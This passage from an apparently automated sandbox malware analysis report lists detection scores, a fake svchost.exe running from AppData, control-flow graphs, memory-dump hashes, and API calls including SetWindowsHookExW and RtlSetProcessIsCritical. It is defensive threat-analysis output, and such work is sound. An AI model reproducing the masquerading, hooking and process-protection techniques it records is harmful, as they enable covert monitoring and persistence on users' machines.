                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:16:22:21
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\svchost.exe"
                                                                                                    Imagebase:0x70000
                                                                                                    File size:74'240 bytes
                                                                                                    MD5 hash:8D52069BD117DA94E0B0B70E73E33FB0
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:24.4%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:12
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 5702 7ffd9a3b2c88 5703 7ffd9a3b2c59 SetWindowsHookExW 5702->5703 5705 7ffd9a3b3951 5703->5705 5686 7ffd9a3b30ad 5687 7ffd9a3b30e2 RtlSetProcessIsCritical 5686->5687 5689 7ffd9a3b3192 5687->5689 5690 7ffd9a3b36cd 5691 7ffd9a3b36e2 5690->5691 5694 7ffd9a3b2c58 5691->5694 5693 7ffd9a3b371b 5695 7ffd9a3b2c59 SetWindowsHookExW 5694->5695 5697 7ffd9a3b3951 5695->5697 5697->5693

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ffd9a3bead8-7ffd9a3beb63 4 7ffd9a3beb65-7ffd9a3beb70 call 7ffd9a3b06b0 0->4 5 7ffd9a3bebad-7ffd9a3bebb5 0->5 9 7ffd9a3beb75-7ffd9a3bebac 4->9 7 7ffd9a3bebb7-7ffd9a3bebd4 5->7 8 7ffd9a3bec2b 5->8 10 7ffd9a3bec30-7ffd9a3bec45 7->10 12 7ffd9a3bebd6-7ffd9a3bec26 call 7ffd9a3bda80 7->12 8->10 9->5 17 7ffd9a3bec47-7ffd9a3bec5e call 7ffd9a3b11a0 call 7ffd9a3b06c0 10->17 18 7ffd9a3bec63-7ffd9a3bec78 10->18 38 7ffd9a3bf86b-7ffd9a3bf879 12->38 17->38 25 7ffd9a3bec7a-7ffd9a3becaa call 7ffd9a3b11a0 18->25 26 7ffd9a3becaf-7ffd9a3becc4 18->26 25->38 34 7ffd9a3becd7-7ffd9a3becec 26->34 35 7ffd9a3becc6-7ffd9a3becd2 call 7ffd9a3bc488 26->35 44 7ffd9a3becee-7ffd9a3becf1 34->44 45 7ffd9a3bed32-7ffd9a3bed47 34->45 35->38 44->8 46 7ffd9a3becf7-7ffd9a3bed02 44->46 50 7ffd9a3bed88-7ffd9a3bed9d 45->50 51 7ffd9a3bed49-7ffd9a3bed4c 45->51 46->8 49 7ffd9a3bed08-7ffd9a3bed2d call 7ffd9a3b0698 call 7ffd9a3bc488 46->49 49->38 58 7ffd9a3bedca-7ffd9a3beddf 50->58 59 7ffd9a3bed9f-7ffd9a3beda2 50->59 51->8 53 7ffd9a3bed52-7ffd9a3bed5d 51->53 53->8 56 7ffd9a3bed63-7ffd9a3bed83 call 7ffd9a3b0698 call 7ffd9a3b4920 53->56 56->38 68 7ffd9a3beeb7-7ffd9a3beecc 58->68 69 7ffd9a3bede5-7ffd9a3bee31 call 7ffd9a3b0620 58->69 59->8 61 7ffd9a3beda8-7ffd9a3bedc5 call 7ffd9a3b0698 call 7ffd9a3b4928 59->61 61->38 76 7ffd9a3beeeb-7ffd9a3bef00 68->76 77 7ffd9a3beece-7ffd9a3beed1 68->77 69->8 102 7ffd9a3bee37-7ffd9a3bee5d 69->102 86 7ffd9a3bef22-7ffd9a3bef37 76->86 87 7ffd9a3bef02-7ffd9a3bef05 76->87 77->8 80 7ffd9a3beed7-7ffd9a3beee6 call 7ffd9a3b4900 77->80 80->38 92 7ffd9a3bef57-7ffd9a3bef6c 86->92 93 7ffd9a3bef39-7ffd9a3bef52 86->93 87->8 88 7ffd9a3bef0b-7ffd9a3bef1d call 7ffd9a3b4900 87->88 88->38 99 7ffd9a3bef8c-7ffd9a3befa1 92->99 100 7ffd9a3bef6e-7ffd9a3bef87 92->100 93->38 106 7ffd9a3befa3-7ffd9a3befbc 99->106 107 7ffd9a3befc1-7ffd9a3befd6 99->107 100->38 106->38 112 7ffd9a3befd8-7ffd9a3befdb 107->112 113 7ffd9a3befff-7ffd9a3bf014 107->113 112->8 114 7ffd9a3befe1-7ffd9a3beffa 112->114 117 7ffd9a3bf01a-7ffd9a3bf092 113->117 118 7ffd9a3bf0b4-7ffd9a3bf0c9 113->118 114->38 117->8 141 7ffd9a3bf098-7ffd9a3bf0af 117->141 121 7ffd9a3bf0cb-7ffd9a3bf0dc 118->121 122 7ffd9a3bf0e1-7ffd9a3bf0f6 118->122 121->38 128 7ffd9a3bf196-7ffd9a3bf1ab 122->128 129 7ffd9a3bf0fc-7ffd9a3bf174 122->129 134 7ffd9a3bf1ad-7ffd9a3bf1be 128->134 135 7ffd9a3bf1c3-7ffd9a3bf1d8 128->135 129->8 158 7ffd9a3bf17a-7ffd9a3bf191 129->158 134->38 143 7ffd9a3bf20a-7ffd9a3bf21f 135->143 144 7ffd9a3bf1da-7ffd9a3bf205 call 7ffd9a3b0b50 call 7ffd9a3bda80 135->144 141->38 150 7ffd9a3bf225-7ffd9a3bf2f7 call 7ffd9a3b0b50 call 7ffd9a3bda80 143->150 151 7ffd9a3bf2fc-7ffd9a3bf311 143->151 144->38 150->38 160 7ffd9a3bf3d8-7ffd9a3bf3ed 151->160 161 7ffd9a3bf317-7ffd9a3bf31a 151->161 158->38 170 7ffd9a3bf3ef-7ffd9a3bf3fc call 7ffd9a3bda80 160->170 171 7ffd9a3bf401-7ffd9a3bf416 160->171 162 7ffd9a3bf320-7ffd9a3bf32b 161->162 163 7ffd9a3bf3cd-7ffd9a3bf3d2 161->163 162->163 167 7ffd9a3bf331-7ffd9a3bf3cb call 7ffd9a3b0b50 call 7ffd9a3bda80 162->167 172 7ffd9a3bf3d3 163->172 167->172 170->38 179 7ffd9a3bf418-7ffd9a3bf429 171->179 180 7ffd9a3bf48d-7ffd9a3bf4a2 171->180 172->38 179->8 190 7ffd9a3bf42f-7ffd9a3bf43f call 7ffd9a3b0690 179->190 187 7ffd9a3bf4a4-7ffd9a3bf4a7 180->187 188 7ffd9a3bf4e2-7ffd9a3bf4f7 180->188 187->8 192 7ffd9a3bf4ad-7ffd9a3bf4dd call 7ffd9a3b0688 call 7ffd9a3b0698 call 7ffd9a3b48d8 187->192 202 7ffd9a3bf4f9-7ffd9a3bf538 call 7ffd9a3b2940 call 7ffd9a3bbc70 call 7ffd9a3b48e0 188->202 203 7ffd9a3bf53d-7ffd9a3bf552 188->203 197 7ffd9a3bf46b-7ffd9a3bf488 call 7ffd9a3b0690 call 7ffd9a3b0698 call 7ffd9a3b48d8 190->197 198 7ffd9a3bf441-7ffd9a3bf466 call 7ffd9a3bda80 190->198 192->38 197->38 198->38 202->38 218 7ffd9a3bf558-7ffd9a3bf5ed call 7ffd9a3b0b50 call 7ffd9a3bda80 203->218 219 7ffd9a3bf5f2-7ffd9a3bf607 203->219 218->38 219->38 231 7ffd9a3bf60d-7ffd9a3bf614 219->231 237 7ffd9a3bf627-7ffd9a3bf741 call 7ffd9a3bc4d8 call 7ffd9a3bc4e8 call 7ffd9a3bc4f8 call 7ffd9a3bc508 call 7ffd9a3bbbd0 call 7ffd9a3bc518 call 7ffd9a3bc4e8 call 7ffd9a3bc4f8 231->237 238 7ffd9a3bf616-7ffd9a3bf61b call 7ffd9a3bc4c8 231->238 286 7ffd9a3bf743-7ffd9a3bf747 237->286 287 7ffd9a3bf7b2-7ffd9a3bf7c1 237->287 245 7ffd9a3bf620 238->245 245->237 288 7ffd9a3bf7c8-7ffd9a3bf861 call 7ffd9a3b0b50 call 7ffd9a3b06a0 call 7ffd9a3bda80 286->288 289 7ffd9a3bf749-7ffd9a3bf79a call 7ffd9a3be748 call 7ffd9a3be758 286->289 287->288 314 7ffd9a3bf868-7ffd9a3bf86a 288->314 299 7ffd9a3bf79f-7ffd9a3bf7a8 289->299 299->287 314->38
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: 01252409994338a60e0af8e698f98633c0816a257d066ce75ba050919c47a3af
                                                                                                      • Instruction ID: f685a7ce1a3c0f6f4b617acecca4808f7a4d59f3083af313c68a743c354b52a7
                                                                                                      • Opcode Fuzzy Hash: 01252409994338a60e0af8e698f98633c0816a257d066ce75ba050919c47a3af
                                                                                                      • Instruction Fuzzy Hash: B4823221F2C9194BEBA8FBB88465A7973D3EF99304F5445BDD01EC32D6DE28E8428741

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CAP_^
                                                                                                      • API String ID: 0-2920077663
                                                                                                      • Opcode ID: 4b6cf2c377f722271d55e6b06deff5ee56fd48b16b7bc41d5e4297689c3a63ac
                                                                                                      • Instruction ID: 27c8ac292dffb495e6dc61c86810cdb011fd92b83987f123553a02e517aca951
                                                                                                      • Opcode Fuzzy Hash: 4b6cf2c377f722271d55e6b06deff5ee56fd48b16b7bc41d5e4297689c3a63ac
                                                                                                      • Instruction Fuzzy Hash: E332A662F2DA495FE798FB6C84796B977D2FF98301B4405BEE00DC32D6DE28A8418741

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 493 7ffd9a3b2c88-7ffd9a3b2c90 495 7ffd9a3b2c59-7ffd9a3b2c73 493->495 496 7ffd9a3b2c92-7ffd9a3b2cb0 493->496 499 7ffd9a3b38a0-7ffd9a3b38fd 495->499 502 7ffd9a3b2cb9-7ffd9a3b2cc6 496->502 503 7ffd9a3b2cb2 496->503 505 7ffd9a3b3989-7ffd9a3b398d 499->505 506 7ffd9a3b3903-7ffd9a3b3908 499->506 502->499 503->502 507 7ffd9a3b3912-7ffd9a3b394f SetWindowsHookExW 505->507 508 7ffd9a3b390f-7ffd9a3b3910 506->508 509 7ffd9a3b3957-7ffd9a3b3988 507->509 510 7ffd9a3b3951 507->510 508->507 510->509
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2559412058-0
                                                                                                      • Opcode ID: 44abf44dd764a08cbee24cc1a62b3cc5fd6ef15d6b867435bfeec590f2b98bea
                                                                                                      • Instruction ID: ad64be6a9a0ccccc1ee0cfb45ee08dc1b13e52b4b423d8d1dc548916081511eb
                                                                                                      • Opcode Fuzzy Hash: 44abf44dd764a08cbee24cc1a62b3cc5fd6ef15d6b867435bfeec590f2b98bea
                                                                                                      • Instruction Fuzzy Hash: FE412831E1CA598FE718EFA898666F97BE1EF95314F0402BFD04DC3197DA24A80587C1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 513 7ffd9a3b30ad-7ffd9a3b3190 RtlSetProcessIsCritical 517 7ffd9a3b3198-7ffd9a3b31cd 513->517 518 7ffd9a3b3192 513->518 518->517
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2695349919-0
                                                                                                      • Opcode ID: f7556645afd45f30d9263930eed369b902f54db4bdcb2d009844d9d68732fe17
                                                                                                      • Instruction ID: 2ed7d0e7ecd29e6b538e19699d94f881319ca2c11a0ca8cf9a1af572c654de3a
                                                                                                      • Opcode Fuzzy Hash: f7556645afd45f30d9263930eed369b902f54db4bdcb2d009844d9d68732fe17
                                                                                                      • Instruction Fuzzy Hash: 9541143190C6488FD719DFA8D855BE9BBF0EF96311F04416FD08AC3692CB746446CB91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 520 7ffd9a3b3878-7ffd9a3b387f 521 7ffd9a3b388a-7ffd9a3b38fd 520->521 522 7ffd9a3b3881-7ffd9a3b3889 520->522 526 7ffd9a3b3989-7ffd9a3b398d 521->526 527 7ffd9a3b3903-7ffd9a3b3908 521->527 522->521 528 7ffd9a3b3912-7ffd9a3b394f SetWindowsHookExW 526->528 529 7ffd9a3b390f-7ffd9a3b3910 527->529 530 7ffd9a3b3957-7ffd9a3b3988 528->530 531 7ffd9a3b3951 528->531 529->528 531->530
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2559412058-0
                                                                                                      • Opcode ID: 998917e8e83b1af2eef06b9a18fa23527b11d2581a149d36635624b2cdd86e14
                                                                                                      • Instruction ID: 410f2c4db602e590d233ccc81f4dcbbdcc0a12ee5481ddda5c3e884dddac7429
                                                                                                      • Opcode Fuzzy Hash: 998917e8e83b1af2eef06b9a18fa23527b11d2581a149d36635624b2cdd86e14
                                                                                                      • Instruction Fuzzy Hash: 5431F731A1CA5D4FDB1CEBAC98566F9BBE1EB59325F04027FD04DC3296CE64A81287C1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 534 7ffd9a3b2c58-7ffd9a3b38fd 540 7ffd9a3b3989-7ffd9a3b398d 534->540 541 7ffd9a3b3903-7ffd9a3b3908 534->541 542 7ffd9a3b3912-7ffd9a3b394f SetWindowsHookExW 540->542 543 7ffd9a3b390f-7ffd9a3b3910 541->543 544 7ffd9a3b3957-7ffd9a3b3988 542->544 545 7ffd9a3b3951 542->545 543->542 545->544
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2559412058-0
                                                                                                      • Opcode ID: dffc9747dc1e0f3829ccc4b6930783d33a9ebfed0cd9bb75351f910b11afb341
                                                                                                      • Instruction ID: c67699990888274fb729fad132a840a6a6461b93c78e32c85716e57ddc9ea9c6
                                                                                                      • Opcode Fuzzy Hash: dffc9747dc1e0f3829ccc4b6930783d33a9ebfed0cd9bb75351f910b11afb341
                                                                                                      • Instruction Fuzzy Hash: 46310731A1CA5C8FDB18EF9CD8566B9BBE1EF99311F00427FD04DC3292CA60A80287C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d56d15c5aebd594f38ed43f0f3635448c09637f8afd3ecb230eba0b1892fbdba
                                                                                                      • Instruction ID: a9d307a84b343cfc51116c541181cc49441f2a8b0c6b246cba2a69f862ee6cf7
                                                                                                      • Opcode Fuzzy Hash: d56d15c5aebd594f38ed43f0f3635448c09637f8afd3ecb230eba0b1892fbdba
                                                                                                      • Instruction Fuzzy Hash: 6ED12031A18A4D8FDF99EF98C455AA97BF1FF68300F1441AAD409D7296CB34EC45CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0bc776df7adbe9e06a23e0a266249d02a7ba73aca940c05ab3259d115f1c9cf9
                                                                                                      • Instruction ID: 34d5e9fe17da5a3d7e2813f3b3c72b1abb1de59c594e5e2ec62b5e85e7141001
                                                                                                      • Opcode Fuzzy Hash: 0bc776df7adbe9e06a23e0a266249d02a7ba73aca940c05ab3259d115f1c9cf9
                                                                                                      • Instruction Fuzzy Hash: 3CD14A23A1EAC94FEB699B6848755B9BBE1EF16314B1801FFD05DCB0D7DA28E805C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b8661b83d997c6bd942e53a074a4f942ae3109f43684977fc26afd158e472a09
                                                                                                      • Instruction ID: 7c5f26c72090470475e1174b533446b413ba526fe919e1184f82f0d2854162f3
                                                                                                      • Opcode Fuzzy Hash: b8661b83d997c6bd942e53a074a4f942ae3109f43684977fc26afd158e472a09
                                                                                                      • Instruction Fuzzy Hash: 4A115E22A1E7C58FD717AB7898750E47FB0EF53211B0D01EBD489CB0A3D5195D48C7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5081a6d391e8ee49059cd0b1ed57e3168ca05a9193e50775281260ae9cec35e8
                                                                                                      • Instruction ID: dcc315893c0d925b5db9061b7279d553ac6e5cdd8b63c53049769ca752e83056
                                                                                                      • Opcode Fuzzy Hash: 5081a6d391e8ee49059cd0b1ed57e3168ca05a9193e50775281260ae9cec35e8
                                                                                                      • Instruction Fuzzy Hash: A3F0E93291858C8FCB59DF6894245E47FE0FF25301B1401DBD44DC7061DA209D14C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab1f53c43c2c1cdfeacbc3e56b637d7edd2f697d55d72b160f0e7bb7c3cbfc9b
                                                                                                      • Instruction ID: f8de7335462a8ca827ca4921cad62446361bbc6416a6deec0a0a1aaccb891c8c
                                                                                                      • Opcode Fuzzy Hash: ab1f53c43c2c1cdfeacbc3e56b637d7edd2f697d55d72b160f0e7bb7c3cbfc9b
                                                                                                      • Instruction Fuzzy Hash: 1A41DB31A1CB488FDB1C9B9CAC466F8BBE0EB95321F04426FD04993692CB757456CBC6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2639907b4ad1992dde507603377c454c6cc1b429ba5c6703c5d5cc033e429621
                                                                                                      • Instruction ID: 21705bcd9198a71bc81fc6cd78666498ed4e9eb1481f51377929b7ec6ac8e983
                                                                                                      • Opcode Fuzzy Hash: 2639907b4ad1992dde507603377c454c6cc1b429ba5c6703c5d5cc033e429621
                                                                                                      • Instruction Fuzzy Hash: 7641083190C7884FEB59DFAC984A7E97BE0EB96331F04816FD049C3192C675645ACB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fcb76b45cfd059b1f38e4fb0a7d13ce4b8ae45d175b8958def0c72689420746f
                                                                                                      • Instruction ID: 5dc0622e5ff5d35094e51827d0447377b25896b396a9792a5b6579d5fd8707a3
                                                                                                      • Opcode Fuzzy Hash: fcb76b45cfd059b1f38e4fb0a7d13ce4b8ae45d175b8958def0c72689420746f
                                                                                                      • Instruction Fuzzy Hash: F531E971A1CB488FDB5C9F5C98466ADBBE1FB98311F14416FE44983252DB30AC55CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1771652000.00007FFD9A2CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a2cd000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 25ee426049ed0049110318ff8d85a1a299f3ffe48c4ebd9e809b62ceeda696da
                                                                                                      • Instruction ID: 9158a7a7d34e98e64c42612f8f1ab4b49b21722eba782f4e9db149dc1213f980
                                                                                                      • Opcode Fuzzy Hash: 25ee426049ed0049110318ff8d85a1a299f3ffe48c4ebd9e809b62ceeda696da
                                                                                                      • Instruction Fuzzy Hash: E541387250DBC44FE76A9B38A8559623FF0EF52314B1A05EFD088CF1A3D625B846C792
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: 9d369bfa64d5877b817d5706bacde89ea542224af3341f95596b0db0e75669cb
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: 2001A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056EE58AC3695DA36E882CB42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0a40f861356fdfddeed1dfdde098b07633b1d7fb177d3a73c1ed3a0f37d7e6b4
                                                                                                      • Instruction ID: 58fdb607b831c27bfd416b1b0376a1adb30bd6e7cd0bab612c59b8de4a4fcec6
                                                                                                      • Opcode Fuzzy Hash: 0a40f861356fdfddeed1dfdde098b07633b1d7fb177d3a73c1ed3a0f37d7e6b4
                                                                                                      • Instruction Fuzzy Hash: A9F0BE32F4C5048FD769EA4CE8558A873E0EF5532471100FBE16DC71A7CA2AEC44C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3059d2885d0487a336986ab04f826921d1c496a2697b3b45c3b8f658edec628
                                                                                                      • Instruction ID: aa2eda569ddd85e0bcfbcb847566feef9fefc9661d4bf4e8af04d1ef3e0506e6
                                                                                                      • Opcode Fuzzy Hash: a3059d2885d0487a336986ab04f826921d1c496a2697b3b45c3b8f658edec628
                                                                                                      • Instruction Fuzzy Hash: 13F0BE32A0C5448FDB68EA5CE8518E877E0EF0532476100F7E15EC71A7CA2AAC54C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: 2ed4424ef3a75d06929694f806a35622031d1cfdf3845083dae98ee417b60841
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: 4FE01A32B4C8088FDAB8DA4CE0549AD73E1EB9833171101B7D14EC7571CA22EC518BC0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                                      • API String ID: 0-3225005683
                                                                                                      • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                                      • Instruction ID: ae6b06e31a669d72ba20d538293c87f57a2b84499e5642d2c749e6ecc5e51ab2
                                                                                                      • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                                      • Instruction Fuzzy Hash: 012126B7B180254ED3017FBDBC169ED3740CFD423834952B2D2AC8B087EA14709A8AD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 02129bd54b06e5da15ad208ea67136fc3bd62422d659142c43d8160f2c7e3634
                                                                                                      • Instruction ID: 5b995e0b3b8c4d114f82890876ae89f9864c5de2838a7e40a538b99405c60c26
                                                                                                      • Opcode Fuzzy Hash: 02129bd54b06e5da15ad208ea67136fc3bd62422d659142c43d8160f2c7e3634
